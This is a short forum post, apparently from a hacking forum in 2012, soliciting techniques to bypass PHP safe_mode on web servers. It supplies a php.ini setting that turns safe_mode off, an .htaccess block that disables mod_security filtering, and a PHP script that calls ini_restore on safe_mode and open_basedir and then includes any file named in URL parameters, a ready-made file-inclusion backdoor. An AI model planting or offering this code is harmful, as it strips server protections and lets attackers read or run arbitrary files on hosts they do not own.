All solutions to break the security Safe Mode To Server's

09/10/2012 21:35 eminem5#1
Hello

This will be the subject of a comprehensive all solutions to break the security situation .. All of it has information shared with us until we collect the largest amount of possible solutions

whe need to get all solutions to kill safe mode in server's

any 1 know any code or have video or tut any thing add him here


ok i will start

and i will back with new tut here in this thread


php.ini
Quote:
safe_mode = Off

.htaccess

Quote:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

ini.php
Quote:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>